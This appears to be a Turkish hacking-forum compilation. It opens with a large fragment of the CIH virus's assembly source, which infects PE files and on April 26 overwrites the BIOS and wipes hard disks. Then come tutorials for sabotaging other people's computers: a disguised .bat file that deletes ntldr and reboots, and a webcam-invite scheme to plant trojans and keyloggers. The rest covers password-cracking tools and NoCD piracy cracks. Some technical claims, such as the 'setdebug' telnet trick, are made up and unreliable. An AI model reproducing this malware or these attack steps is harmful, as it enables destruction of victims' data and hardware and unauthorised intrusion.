; * ESP => ————————- *
; * | EFLAG(CF=0) | *
; * ————————- *
; * | FileNameBufferPointer | *
; * ————————- *
; * | EDI | *
; * ————————- *
; * | ESI | *
; * ————————- *
; * | EBP | *
; * ————————- *
; * | ESP | *
; * ————————- *
; * | EBX | *
; * ————————- *
; * | EDX | *
; * ————————- *
; * | ECX | *
; * ————————- *
; * | EAX | *
; * ————————- *
; * | Return Address | *
; * ————————- *
; ****************************** *******
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let’s Set the *
; * Virus’ Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let’s Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let’s Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let’s Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-[at][esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-[at][esi]
mul cl
; ***************************
; * Let’s Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-[at]FPRIVATE “TYPE=PICT;ALT=Cool”[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTab le
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-[at]9)[esi]
jnc short OnlySetInfectedMark
not ecx
inc ecx
cmp cx, small CodeSizeOfMergeVirusCodeSectio n
jb OnlySetInfectedMark
; ***************************
; * Save Original *
; * Address of Entry Point *
; ***************************
; Save My Virus First Section Code
; Size of Following Section Table…
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
mov eax, (AddressOfEntryPoint-[at]9)[esi]
add eax, (ImageBase-[at]9)[esi]
mov (OriginalAddressOfEntryPoint-[at]9)[esi], eax
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let’s Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTab le
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, eax
push edx ; Pointer of File
add eax, esi
push eax ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [eax+edi-04h]
mov [eax], ebx
; ***************************
; * Let’s Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-[at]9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let’s Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-[at]9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-[at]9)[edx]
sub ebx, (VirtualSize-[at]9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-[at]9)[edx]
add ebx, (VirtualSize-[at]9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-[at]9)[edx]
add ebx, (VirtualAddress-[at]9)[edx]
add ebx, (ImageBase-[at]9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-[at]9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-[at]9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMar k
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMar k:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the ‘int 20h’ and the *
; * ‘Service Identifier’ *
; * to ‘Call [XXXXXXXX]‘. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-[at]9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-[at]9)[esi]
%0mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-[at]9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let’s Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let’s Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; ****************************** *******
; * Close File *
; ****************************** *******
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ****************************** *******
; * Need to Restore File Modification *
; * Time !? *
; ****************************** *******
popf
pop esi
jnc IsKillComputer
; ****************************** *******
; * Restore File Modification Time *
; ****************************** *******
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-[at]7)[esi]
mov edi, (FileModificationTime+2-[at]7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; ****************************** *******
; * Disable OnBusy *
; ****************************** *******
DisableOnBusy:
dec byte ptr (OnBusy-[at]7)[esi] ; Disable OnBusy
; ****************************** *******
; * Call Previous FileSystemApiHook *
; ****************************** *******
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; ****************************** *******
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; ****************************** *******
pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-[at]6)[esi], eax
; ***************************
; * Quit My Virus’ *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; ****************************** *******
; * Kill Computer !? … *^_^* *
; ****************************** *******
IsKillComputer:
; Get Now Month from BIOS CMOS
mov ax, 0708h
out 70h, al
in al, 71h
xchg ah, al
; Get Now Day from BIOS CMOS
out 70h, al
in al, 71h
xor ax, 0426h ; 04/26/????
jne DisableOnBusy
; ****************************** ********
; * Kill Kill Kill Kill Kill Kill Kill *
; ****************************** ********
; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-[at]7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 – 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 – 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-[at]10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 – 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted… *
; ***********************
lea ebx, EnableEEPROMToWrite-[at]10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 – 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 – 000FFFFF *
; * ( 128 KB ) *
; * can be Writted… *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 – 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 – 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-[at]10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ****************************** ******************** *
; * IOR Structure of IOS_SendCommand Needs *
; ****************************** ******************** *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ****************************** ******************** *
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
[at]10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
; ****************************** ******************** *******
; * Static Data *
; ****************************** ******************** *******
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
; ****************************** ******************** *******
; * Virus Version Copyright *
; ****************************** ******************** *******
VirusVersionCopyright db ‘CIH v’
db MajorVirusVersion+’0′
db ‘.’
db MinorVirusVersion+’0′
db ‘ TTIT’
; ****************************** ******************** *******
; * Virus Size *
; ****************************** ******************** *******
VirusSize = $
; + SizeOfVirusCodeSectionTableEnd Mark(04h)
; + NumberOfSections(??)*SizeOfVir usCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSection Table(04h)
; ****************************** ******************** *******
; * Dynamic Data *
; ****************************** ******************** *******
VirusGameDataStartAddress = VirusSize
[at]6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?
FileNameBuffer db FileNameBufferSize dup(?)
[at]7 = FileNameBuffer
DataBuffer = $
[at]8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
[at]9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = [at]9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRe********s = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRe********s = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName
; ****************************** ******************** *******
; * Virus Total Need Memory *
; ****************************** ******************** *******
VirusNeedBaseMemory = $
VirusTotalNeedMemory = [at]9
; + NumberOfSections(??)*SizeOfSce tionTable(28h)
; + SizeOfVirusCodeSectionTableEnd Mark(04h)
; + NumberOfSections(??)*SizeOfVir usCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSection Table(04h)
; ****************************** ******************** *******
VirusGame ENDS
sonuçları bilgisayara cok buyuk hasar verecektır… Mesela çok nefret ettiğiniz bir insanın anaKartını kendi eliyle yaktırabilirsiniz…
13.Yöntem Hazır Dosyayla
PC ÇÖKERT (cok basıt)%100 Etkili
PC ÇÖKERT (cok basıt)%100 Etkili arkadaşlar sitede pc çökertme konusunda çoğu yol işe yaramıyor, fakat birde bu yolu deneyin diyorum. %100 çalışıyo emin olun.
dosyayı sadece karşı tarafa yolluyorsunuz, ilk başta bir şey olmamış gibi gözüküyor fakaaaattt pcyi kapayıp açtığında formattan başka çaresi kalmıyor.
kolay gelsin…
Link= [Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
]
Dosyayı sakın dıyım kendınız acmaayınnnnnn..
14.Yöntem Webcam Teklifi İle
Şimdi sürekli piyasada dolaşan ama kimsenin bi türlü bulamadığı msn veya banzeri sender programlarda kullanılan webcamerası açma daveti ile nasıl kurban pc sine müdahale edileceğini açıklayacağım.
1.ilk yapılacak olay IP nizi gizlemektir(bunu hide ip platinium programı ile yapabilirsin)
2.ikinci hadise sahte bir msn adresi alın(unutmayın öyle doğum tarihi falan gerçek yazmayın) işimzi bittikten sonra bu adresi imha edeceğiz yoksa enselenir 6 ay yatar çıkarsınız…
3.olay bütün portlarınızı kapatın sadece msn için açık olan portu açık tutun
4.teşhir msn comtlarından girip not defterine açın orda her gördüğünüz cam-send yazısını camsendd olarak değiştirin artık gönderdiğiniz camera isteğini kabul etsede red etsede camerası açılır ve sizin pc niz le onun pc si arasında bir port açılır iletişim için bu camreraya özel bir portttur ve başka bir şey için kullanılamaz normalde.ama biz bunu değiştireceğiz.şimdi açılan bu portu bulmanız lazım ki açerden bi trojan yollayabilelim.port scaner kullanın ve açık portu bulun.
5.olay açık olan porttan önceden hazırladığımız trojanı tavsiye olarak zip içinde (msn securitye yakalanmamak için) yollayın gitsin.şimdi bu trojanın tek özelliği firewalldan geçtikten sonra firewalların klasik komutu olan avrst komutunu gördüğü anda zip içinden çıkıp çalışmaya başlamasıdır.(bu tarz bir trojanı biraz aramayla her yerden bulursunuz)UNUTMAYIN EN İİ KAYNAK GOOGLE DIR.zaten olay bundan sonra kolay trojan içerde çalışmaya başladığı anda kurban msn den düşer ve tekrar msn çevrim içi olur.bu noktadan sonra kurban her nete girdiğinde bizim açtığımız port trojanımız sahesinde sürekli açık kalacak ve firewallar trojanın özelliği olarak tanımayacak(30 a yakın antivirüste bu trojan cinsi denendi sadece nod 32 ve karpersky yakaladı bilginize)açık olan portumuzdan bi tane keyloger bir tane prorat server yolayıp içerde açıyoruz.yanlız masa üstünü kurcalamayın kurban anında anlar format atarsa işiniz biter. gerisi için hayal gücünüz yeter asıl önemli noktayı anlattım.gerisi keyfinize kalmış.
15.Yöntem Virüs Hazırlayarak
AntivirüsLerin ßuLamadigi Virüsünü Yap %100 Pc cöker – 04-20-2007, 09:41 AM
AntivirüsLerin ßuLamadigi Virüsünü Yap %100 Pc cöker
arkadaşlar daha önceden verilmiş farkında deilim. fakat bende bi tekrarlama yapmış oldum bu arada vede ufak düzenlemelerle anlaması daha basit bir hale getirdim
İşte kodlar:
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!
örneğin; güzelresimler.bat
sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.
haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.
yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..
panzehir kodları;
shutdown -a
16.Yöntem Ms-dostan Pcye gir
ms-dos a geç , ve *setdebug* yaz karşına *Enable AktiveX debugging for Java* diye bir yazı gelecek ona tamam de ve bir sonraki satıra *debug* yaz sonra diğer satıra *XAbilgine gireceğin ip* yi yazıp enter ediyoruz sonra işleyici oluşturuldu yazısı gelecek şimdi “Programlar>Çalıştır>telne t” yazıp telneti açıyoruz sonra “uzaktaki sistem” deyip adamın ip’sini tekrar yazıyoruz gerisi size kalmış bu komutları kullanabilirsin. (*) ları yazmıyoruz. Kolay gelsin…
CaptureScreen Ekrandan goruntu alır
DelFile;(filename.exe) Dosya siler
DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]
DisableKeys;0; Klavye tekrar aktif olur Yazının devamını oku »
Kullanıcıların en çok merak ettikleri konulardan bir tanesi yeni nesil Windows işletim sistemlerinin şifre konusunda ne kadar güvenli olduğudur. Windows’un açılışında çıkan kullanıcı adı ve şifresi, değişik zevklere hitap eden masaüstü ve klasör ayarlarını yapmamıza izin verirken aynı zamanda bir güvenlik önlemi niteliği taşır. Yönetici hesabına sahip olan kullanıcılar özgürce uygulama yükleyebilir ve sistem ayarlarında değişiklik yapabilir. Konuk hesaplarının işletim sistemi üzerinde yapabileceği değişikliklerse sınırlıdır. Kullanıcı hesapları aynı zamanda dosyaların şifrelenmesine izin vermektedir. NTFS dosya saklama sistemi ile birlikte çalışan şifreleme özelliği, kullanıcıların birbirlerinin dosyalarını görüntüleme haklarını sınırlar. Bu konuda daha fazla bilgi almak için ‘Dosyalarınızın güvenliğini sağlayın’ adlı başlığımızı inceleyebilirsiniz.
Offline NT Password & Registry Editor, Bootdisk / CD adlı bu ücretsiz çözümü indirmek için http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html adresine bağlanın. Bu adresteki disket imajını (bd041205.zip adını taşımaktadır) sabit diskinize kaydedin. Daha sonra imajı bir klasöre açarak Install.bat dosyasını çalıştırın. Uygulama bir DOS penceresi açacak ve RAWRITE uygulamasını kullanarak imajı diskete aktaracaktır. Bilgisayarınızı bu disketle açmak için BIOS’ta bazı değişiklikler yapmanız gerekebilir. Disketi sürücüye yerleştirdikten ve bilgisayarınızı ateşledikten sonra Linux tabanlı küçük bir işletim sistemi, daha sonra küçük bir uygulama yüklenir.
Uygulamanın metin tabanlı ve İngilizce olan arayüzünün kullanımı bazılarımızı zorlayabilir. Fakat paniğe gerek yok, çoğu zaman sadece Enter tuşuna basarak aşamaları başarılı bir şekilde edebiliyor, sistemde yüklü olan kullanıcı hesaplarını listeleyebiliyorsunuz. Yardımcı olması açısından uygulamaya sağlamanız gereken bilgileri sıralayalım:
Windows altında çalışan neredeyse tüm uygulamalarda ve Windows’un tüm bileşenlerinde şifre hanesine yazılan karakterler yıldız karakteri altında saklanır. Örneğin bir şifre kutusuna deneme yazdığınızda görülen sonuç ****** şeklinde olacaktır. Windows 95 de dahil, işletim sisteminin tüm sürümlerinde bu karakterlerin altında bulunan harşeri ortaya çıkarmak için basit bir uygulama kullanabilirsiniz. Asterisk Key (http://www.lostpassword.com/) adındaki 315 KB yer kaplayan bu ücretsiz uygulama açık olan tüm pencerelerdeki, yıldız ile saklanmış şifreleri size gösterecektir.
Sabit disk alanınızı daha iyi değerlendirmek, birbiri ile ilgili olan dosyaları bir arada tutmak, yazıtipi ve simge gibi sabit diskte çok fazla bölünmeye yol açan dosyaları paketlemek gibi amaçlara hizmet eden dosya sıkıştırma uygulamaları, bilgilerinizi şifrelemek için de kullanılabilir. ZIP, RAR, ACE ve ARJ formatlarının tümü şifrelemeye izin verir. Şifre taşıyan ZIP uzantılı dosyaları açmak ve içeriğini görüntülemek için www.zip-backup.com/zippassword adresinden indirilebilen Zip Password Recovery adlı uygulamayı kullanabilirsiniz. Uygulama ücretsiz olmasına karşın sizden bir seri numarası ister. Programın web sitesine kayıt olarak ücretsiz seri numaranızı almanız mümkündür.
Konumuzda çeşitli dosya türleri için şifre bulma yöntemlerini anlatıyoruz; bazı dosya türlerinin şifreleme tekniği henüz keşfedilemediği için bu türdeki dosyalar sadece deneme yanılma yöntemi ile açılabiliyorlar. ZIP formatının da şifreleme tekniği henüz bulunabilmiş değil, bu tür dosyalar için Zip Password Recovery veya Zip Password Recovery gibi saniyede 100.000′den fazla kelime deneyen ücretsiz uygulamalarından bir tanesini tercih edebilirsiniz.
Metin ve imaj barındıran dokümanların tüm ortamlarda aynı şekilde görüntülenebilmesi, çıktı alındığında herhangi bir sürpriz ile karşılaşılmaması için Adobe tarafından geliştirilen Postscript tabanlı Acrobat formatı, yıllar içerisinde gelişti ve yaygınlaştı. Acrobat dosyaları, (PDF uzantısı taşır) ürünlerin kullanım kılavuzlarının CD’lerde dağıtılması, çeşitli projelerin dijital ortamda saklanması, masaüstü yayıncılık gibi birçok farklı alanda sorunsuz biçimde kullanılıyor. PDF dosyalarına şifre koyarak içeriğinin değiştirilmesini, okunmasını, kopyalanmasını veya yazdırılmasını önlemek mümkündür. PDF dosyalarına iki ayrı türde şifre konulabilir. Bu şifrelerden bir tanesi dosyanın içeriğinin görülmesini engelleme, diğeri ise dosyanın sahip olduğu diğer koruma türlerinin (kopyalama, yazdırma gibi) değiştirilmesini engelleme amaçlıdır. Kendi oluşturduğunuz PDF dosyasına bir şifre koyduysanız ve bunu hatırlayamıyorsanız endişe etmeyin, şifreyi ortaya çıkarmak için hazırlanmış özel bir uygulamadan faydalanabilirsiniz.
Passware firması, unutulan şifrelerin bulunması konusunda uygulama geliştiren en ciddi firmalardan biri. Firmanın hemen her türde dosya, hizmet ve işletim sistemi için bir uygulaması bulunuyor. Firmanın http://www.lostpassword.com/ adresine bağlandıktan sonra şifresini bulmak istediğiniz dosya türü ile ilgili uygulamayı deneyebilir, dilerseniz satın alabilirsiniz. Passware dosyalarınızdaki şifreleri bulsa bile ne yazık ki ücret ödenmediği sürece söylemiyor. Fakat sadece bir dosya türü için şifre bulma çözümüne ihtiyaç duyuyorsanız fazla ücret ödemeniz gerekmiyor. Passware sistem yöneticilerini de düşünerek birden fazla dosya türünün şifresini ortaya çıkarma yeteneğine sahip program paketleri de hazırlamış. Örneğin tüm Office uygulamaları için sıkıştırılmış dosyalar için program paketleri mevcut. Tüm uygulamaları kapsayan program paketinin ismi Passware Password Recovery Kit ve Lotus 1-2-3, MS Access veritabanı, Adobe Acrobat, Symantec ACT!, MS Backup, Microsoft Excel, FileMaker, IE Content Advisor, Microsoft Mail, MS Money, Lotus Organizer, Microsoft Outlook, Outlook Express, Paradox, Microsoft Project, QuickBooks, Quicken, WinRAR, RAR arşivi, Microsoft Schedule+, VBA Projesi, Windows XP, 2000, NT 4.0, Microsoft Word, WordPerfect, Lotus WordPro, WinZip ve PKZip dosyalarını açabiliyor. Passware tarafından geliştirilen Xieve şifre deneme sisteminde İngilizce kelimeler için yüzde 95, diğer dillerde ise ilk taramada yüzde 70′lere varan şifre bulma oranı yakalanıyor. Dakikada 75 milyon kelime hızla çalışan Xieve, tüm şifre varyasyonlarını denemediği için kesin bir bulma garantisi vaat edilmiyor. Fakat Brute Attack moduna geçildiğinde doğru şifrenin kaçırılması söz konusu değil. Passware ile özel bir başlangıç disketi hazırlayarak Windows XP/NT/2000′i yönetici hakları ile açabilirsiniz.
Önce http://www.gamecopyworld.com/ veya http://www.megagames.com/ sitesine bağlanarak kopyasını oluşturmak istediğiniz yazılımı bulun. Bu yazılım için sunulan NoCD, Fixed EXE veya benzeri isme sahip dosyayı bilgisayarınıza indirin. Orijinal CD’nizin tüm içeriğini, dosya – klasör hiyerarşisini bozmadan bilgisayarınıza kopyalayın. Artık içeriği boş bir CD’ye yazabilirsiniz. Tabii internetten indirdiğiniz dosyayı yazdığınız CD’ye dahil etmeyi unutmadan. İlgili yazılımı veya oyunu kuracağınız zaman, kurulum işlemi tamamlandığında indirdiğiniz özel dosyayı açıklama dosyasında belirlenen dosya üzerine kopyalayarak (genellikle uygulamayı çalıştıran EXE dosyasının üzerine) uygulamayı serbestçe kullanabilirsiniz. Bu özel dosya, aynı zamanda uygulamayı kullanmak için orijinal CD’nin CD sürücünüze takılı olma zorunluluğunu da ortadan kaldırır.
